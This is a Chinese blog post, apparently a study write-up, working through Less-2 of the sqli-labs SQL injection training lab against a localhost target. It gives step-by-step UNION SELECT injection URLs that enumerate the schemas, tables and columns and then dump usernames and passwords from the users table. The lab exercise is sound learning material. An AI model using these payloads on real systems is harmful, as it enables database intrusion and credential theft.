sqli-libs(2)

Lesson2:数字型注入我们先来测试一下

http://127.0.0.1/sql1/Less-2/?id=1%20and%201=1

发现未报错 这里知道我们的数字型注入是不需要 进行单引号闭合的

这里我们构造语句进行爆库名 因为之前知道这里是3列 所以 我们进行时就不用order by了  这里要注意id的参数为-1

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20database())

接下来我们进行对数据库名的查看

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)

接下来是对表名的爆破

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)

这里要注意 最后的库名称=  的函数是 table_schema= 这个函数 我开始一直写的 schema_name  一直错 哈哈

得知表名后 我们可以查看关键信息的表 比如uers我觉得就很关键

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)

这里看见username和password应该是我们要数据 所以 开始爆破字段吧

http://127.0.0.1/sql1/Less-2/?id=-1%20union%20select%20null,null,group_concat(id,0x3a,username,0x3a,password)%20from%20security.users

ok 到这里我们就得到关键数据 呐 切记 学习不能只求进度 懂了你才能学到知识

少就是多 慢就是快

posted @ 2019-05-17 08:46  yourse1f  阅读(1004)  评论(2编辑  收藏  举报